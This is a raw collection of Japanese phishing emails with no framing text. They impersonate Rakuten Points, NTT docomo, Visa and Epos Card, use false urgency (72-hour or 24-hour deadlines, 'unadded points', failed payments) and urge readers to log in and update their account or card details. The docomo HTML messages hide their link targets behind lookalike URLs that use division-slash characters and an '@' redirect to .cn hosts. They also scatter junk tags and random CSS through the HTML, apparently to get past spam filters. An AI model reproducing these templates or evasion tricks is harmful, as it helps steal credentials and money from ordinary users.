【緊急】楽天ポイント未反映の緊急対応のお願いGB=9067258451092
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株
式会社より、ポイント管理に関する公式通知を申
し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお&#
20253;えするものです。通知内容未加算ポイント:4,318ポイント有効期限:本通知受信
後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延
。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続
き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限
が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完
了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天
ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個
人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【重要】楽天ポイント未反映分の緊急修正のお知らせCO=97648714927913
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理
に関する公式通知を申し上げます。弊社の最新のシステム監
査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当
ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,508ポイント有効期
限:本通知受信後72時間原因:登録情報と取引データの不一
致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情
報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限
が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了
しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>©
Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護
方針本メールは送信専用です。お問い合わせはこちらから。
NTTドコモの料金支払いのポイントOS=367545504208
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ヱゃぅニづのでしょシ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.Phuxmcrwd-Dcfdzq-Fcpqdtlt .HABjSMPp-zUEfKofvYm-clL .hyCr-Ckbl .Gmjrsginmy-Qausuqluz-Tpitpjij #Fmsutjnl-Aqfq .vkkuv-hnxaydxzdk #DdVdnVrNHesJ .AXKJPp {
border-collapse:separate;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>このた<ksbyhj>び</ksbyhj>、【<yqomf>お</yqomf>客<pyl>様</pyl>番号<azy>】</azy>様の<lkougqkh>【</lkougqkh>2<yolis>0</yolis>25<uvt>年</uvt>06月<rqv>】</rqv>分<eloktua>の</eloktua>料金<msszefrd>の</msszefrd>お支払<mdx>い</mdx>が<ednpksxy>正</ednpksxy>常<fvzaftkn>に</fvzaftkn>完了し<icvo>な</icvo>かった<nluwq>こ</nluwq>と<ofq>を</ofq>お<lgptw>知</lgptw>ら<krdzhcpe>せ</krdzhcpe>い<chynzfm>た</chynzfm>し<hyrluplz>ま</hyrluplz>す<rogtp>。</rogtp></div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://arde.net∕hyidwndqk∕jdvxmest∕dkvbjwn∕nuvogioto∕ovhdnvii∕oruroa∕jjlxz@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
【重要】楽天ポイント未反映分の緊急修正のお知らせKZ=1183399318926
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,700ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【重要】楽天ポイント加算処理の遅延についてXO=7015187075744
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,950ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
重要通知:visacardのご利用確認を早急にお願いします。takahata.ken.lover753486850
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
ドコモの利用代金の支払い方法HC=0504583124
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]とドずバはどガ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
#Zrw-Pmavj-Nnj .Wqbos-Lcnbga .dqhasc-nrzrrlbizp .Hjjhmfuunfaaz .bmtfxdkpbv-bec .RjNnbABrlYxYGIRI #cVG-YOkJ-LExC .kqqb-fwreyqldek .Eufaumvvjpqnxe #Auwdva-Yadtnzivhz {
outline-width:medium;
display:inline;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>このた<prdokvc>び</prdokvc>、<ondokmm>【</ondokmm>お客様<crtkwb>番</crtkwb>号<dzfnfyfg>】</dzfnfyfg>様の【<ggxg>2</ggxg>02<nfs>5</nfs>年0<ilv>6</ilv>月】<snaeu>分</snaeu>の<nrclhio>料</nrclhio>金<vhfvs>の</vhfvs>お支払<qxr>い</qxr>が正常<xvokj>に</xvokj>完了<sfkk>し</sfkk>なかっ<konrgw>た</konrgw>こ<rmepir>と</rmepir>を<khdsi>お</khdsi>知らせ<obymigdl>い</obymigdl>たし<hhi>ま</hhi>す。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://qwan.com∕blerujyil∕tgcuibh∕gugxoso∕frqzy∕xhzspwfzx∕ngvrhbuewm∕hldxl@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
ドコモの月額費用のお支払いについてUS=149800207133562
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]セルヲらスンングなく</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.Xdy-Miysyhvi-Xlgb #Kvncyopetht .zzlhjubocmibfqgz #sFeGTMV-NZHBZpzV #Xjiwtatx-Zytae-Rcxj .cpDxWq-KLQkAJmbN #REN-mFsNFuafj #Ahicl-Qgdn .IrEMzMSpyq-EDhqLKbrm {
word-break:normal;
writing-mode:horizontal-tb;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>こ<wmmbxq>の</wmmbxq>たび、<ops>【</ops>お客様<shqkt>番</shqkt>号】<jbdc>様</jbdc>の<uuoawmlz>【</uuoawmlz>202<umtmbtqe>5</umtmbtqe>年06<jbycehbt>月</jbycehbt>】分<ikeavwp>の</ikeavwp>料<gykuhvy>金</gykuhvy>のお<dpkyry>支</dpkyry>払いが<wmvolst>正</wmvolst>常に<khsree>完</khsree>了<eyygq>し</eyygq>な<ikpq>か</ikpq>っ<tfnba>た</tfnba>こと<evgqrql>を</evgqrql>お<yzlh>知</yzlh>らせ<zpmfg>い</zpmfg>たし<accs>ま</accs>す。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://zgcc.com∕bkjslpaoym∕wzinknf∕brwpgv∕xutqt∕ufhijixqy∕nnausqz∕ewoshe@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
【重要】楽天ポイント未付与分の緊急確認依頼YR=2397816781
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各
位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新
のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該
当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,
199ポイント有効期限:本通知受信後72時間原因:登録情報
と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録
情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施
本件は、ポイントの有効期限が迫っているため、速やかな対応
が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※
ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten
Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専
用です。お問い合わせはこちらから。
ドコモの利用料金のお支払い方法HZ=1031120379
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ヲバざナドロブゆこパ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.Ywqdo-Gqapqe-Wse #Ngnvdzpmj #rHC-PUhuKTxtEB #Btuwkha-Bmezyw-Mnho .Hasnqudgpx-Zitsfyj-Ltkzlua #nBz-gxOiTGk-QTntW .Iieznexbh-Qnhejjcm #beNriWALcSzRfNWsAaWD .ZIaH-TnypiRo-vGrn #xdse-laplhs {
font-style:normal;
}
</style><style>
.hzwu-frhmry-rrfjqgwzw #raampdhqyezkmmnyax .Tup-Vmsxsi-Xad #Rikhxmsvx #Yygitxgkzt-Ptgwxmmi-Tvfq #pUJWqZaNs-DnkgNmUIQ-IFQrwRD #Qzycynhviptmncxf #pizoherbinmkwrqfpice #Ifu-Ctkf-Odnkqlry #Iwewvxxiwb-Tqgqimzpi {
box-decoration-break:slice;
animation-duration:0;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>こ<njcnfbxv>の</njcnfbxv>た<xqui>び</xqui>、<rito>【</rito>お客様<ifptpz>番</ifptpz>号<cbyslhco>】</cbyslhco>様の【<eww>2</eww>025<vad>年</vad>06月<seh>】</seh>分の料<xawyllyc>金</xawyllyc>のお支<wsb>払</wsb>い<edmqke>が</edmqke>正常に<cutmh>完</cutmh>了しな<ytg>か</ytg>った<gfqkrf>こ</gfqkrf>とをお<shdygb>知</shdygb>らせい<rrireo>た</rrireo>します<szr>。</szr></div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://zmcu.com∕mbyjfwciq∕kweadeyrd∕abher∕iefxxzqme∕oqjmvy∕eihbo∕mfgqz@bcye.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
【緊急連絡】楽天ポイント加算遅延のお知らせRU=57115249805
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,890ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
NTTドコモの請求金額の支払いガイドOX=563904492555
<html lang=ja xmlns="http://www.w3.org/1999/xhtml"><head><title>[PR]ぬざウイそぎ</title><meta content=ja http-equiv=Content-Language><meta content="text/html; charset=utf-8" http-equiv=Content-Type><meta content=text/css http-equiv=Content-Style-Type><style type=text/css><style> body { font-family: 'Meiryo', 'Hiragino Kaku Gothic Pro', sans-serif; line-height: 1.6; color: #333; max-width: 600px; margin: 0 auto; padding: 20px; } .header { color: #d62027; font-size: 18px; font-weight: bold; margin-bottom: 20px; border-bottom: 2px solid #d62027; padding-bottom: 5px; } .payment-notice { background-color: #f8f9fa; padding: 15px; border-radius: 5px; margin: 15px 0; } .payment-methods { background-color: #fff8e6; padding: 15px; border-radius: 5px; margin: 15px 0; } .button { display: inline-block; background-color: #d62027; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px; margin: 15px 0; font-weight: bold; } .note { font-size: 13px; color: #666; margin: 15px 0; } .contact { margin-top: 20px; padding-top: 15px; border-top: 1px solid #eee; } .footer { font-size: 12px; color: #777; margin-top: 30px; border-top: 1px solid #eee; padding-top: 15px; } </style><style>#lhtjtguhlbc #Jlhatvpg-Fkwcz-Gxqvnmg .Zdqemdkty .spf-eanzwduuf #Fhcp-Uur .czdemdfeapthgieiw #qJkBJvOVVR-PfkwZNY-HaXuE #Hymxiccmk-Pmcihhfcy-Bweo {line-height:normal;box-sizing:content-box;}</style><style>
.HdBkmgrv-wRTmFJgn-WwpWzc .czfqqeyemj #aplzqd-zvmbvyklso {
background-size:auto;
}
</style></head><body><div class=header>docomo料金のお支払いについて</div><div>いつもdocomoをご利用いただきありがとうございます。<br>この<kgisosw>た</kgisosw>び、【<spus>お</spus>客<tfocttdu>様</tfocttdu>番号】<kio>様</kio>の<ksvs>【</ksvs>20<oxjxy>2</oxjxy>5年<wtdbgexm>0</wtdbgexm>6月<fbhmg>】</fbhmg>分<kir>の</kir>料金<xyah>の</xyah>お<ieev>支</ieev>払い<yhz>が</yhz>正常<jrt>に</jrt>完<prew>了</prew>しな<fnqr>か</fnqr>っ<webyrs>た</webyrs>ことを<fkqdoyqv>お</fkqdoyqv>知<zixpjjcr>ら</zixpjjcr>せ<yrf>い</yrf>たしま<jlvh>す</jlvh>。</div><div class=payment-notice><div>大変お手数ですが、以下の方法にて再度お支払い手続きをお願いいたします。</div></div><div class=payment-methods><div><strong>お支払い方法</strong></div><ul> <li>docomoアプリまたはMy docomoからクレジットカードでお支払い <li>コンビニエンスストアでのお支払い <li>銀行ATMまたはネットバンキングでのお支払い </li></ul></div><a class=button href="https://cicl.com∕hlftzblks∕nkqbhhmd∕sunlywwcq∕dzellroqs∕tnasf∕bveoy∕hzmwuzgwdy@kzet.cn/">ご利用確認はこちら</a> <div class=note><div>※既にお支払い済みの場合は、本メッセージを無視していただいて結構です。</div></div><div class=contact><div>docomoカスタマーセンター:0120-800-000<br>受付時間:9:00~20:00(年中無休</div></div><div class=footer><div>※本メールは送信専用です。返信いただいてもご回答できませんのでご了承ください。</div><div>ご不便とご心配をおかけしまして誠に申し訳ございませんが、<BR>何とぞご理解賜りたくお願い申しあげます。</div></div><br><br></body></html>
重要通知:visacardの利用確認をお急ぎでお願いします。hitoshi-moriya6854691
【緊急】Visaカードセキュリティ確認要請緊急のお知らせいつもVisaカードをご利用いただき、ありがとうございます。お客様のカードに登録された携帯電話番号の確認が至急必要です。セキュリティ保護のため、24時間以内に手続きを完了してください。 リスク警告未対応の場合、アカウントの利用が制限される可能性があります。速やかなご対応をお願いいたします。 【今すぐ確認手続きを実施してください】下記のリンクをクリックし、画面の指示に従って手続きを進めてください。 確認手続きを進める サポート連絡先ご不明な点はVisaカスタマーサービスまでご連絡ください。発行者: Visaカード東京都中野区中野4-3-2 Visa CO., LTD. All rights reserved
【重要】楽天ポイント加算処理の遅延についてWF=988782921484252
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,434ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【緊急通知】楽天ポイント加算不備の確認案内IM=031898323705034
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株
式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監
査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳
細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,398ポイント有効期限:本通知受
信後72時間原因:登
録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了
後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有
効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期
限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元
:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本
メールは送信専用です。お問い合わせはこちらから。
【重要なお知らせ】エポスカードご利用確認.
エポスカードをご利用のお客さま利用いただき、ありがとうございます。
このたび、ご本人様のご利用かどうかを確認させていただきたいお取引がありましたので、
誠に勝手ながら、サービスのご利用を一部制限させていただき、ご連絡させていただきました。
ご利用確認はこちら
このメールは、エポスNetにご登録されたかたへ送信させていただいております。
本件にお心当たりがないかたは、お手数ですが下記までご連絡をお願いいたします。
エポスカスタマーセンター(9:30~18:00)
東京 03-3383-0101
大阪 06-6630-0101
──────────────────────────────────
株式会社 エポスカード
東京都中野区中野4-3-2
https://www.eposcard.co.jp/
──────────────────────────────────
Copyright All Right Reserved. Epos Card Co., Ltd.
無断転載および再配布を禁じます。
【緊急通知】楽天ポイント加算漏れの確認依頼AM=70792341470
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,149ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
【緊急通知】楽天ポイント加算不備の確認案内HG=3381770718946
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員
各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊
社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳
細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,
064ポイント有効期限:本通知受信後72時間原因:登
録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情
報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本
件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※
有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽
天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment,
Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合
わせはこちらから。
【緊急通知】楽天ポイント加算不備の確認案内CG=093286183137
楽天ポイント未加算ポイントに関する公式通知楽天ポイント会員各位楽天ペイメント株式会社より、ポイント管理に関する公式通知を申し上げます。弊社の最新のシステム監査において、お客様のアカウントに未加算のポイントが確認されました。本通知は、該当ポイントの詳細および必要な対応をお伝えするものです。通知内容未加算ポイント:4,306ポイント有効期限:本通知受信後72時間原因:登録情報と取引データの不一致によるシステム処理の遅延。対応:以下のボタンをクリックし、楽天アカウントにログインの上、登録情報を更新してください。手続き完了後、ポイントは即時加算されます[。手続きを実施 本件は、ポイントの有効期限が迫っているため、速やかな対応が求められます。ご協力をお願い申し上げます。※ 有効期限内に手続きが完了しない場合、ポイントは失効します。※ ご不明な点は、楽天ポイントサポートページをご確認ください。発行元:楽天ペイメント株式会社>© Rakuten Payment, Inc.楽天ポイントトップ | 個人情報保護方針本メールは送信専用です。お問い合わせはこちらから。
NTTドコモのサービス代金の支払いDT=76928639559900
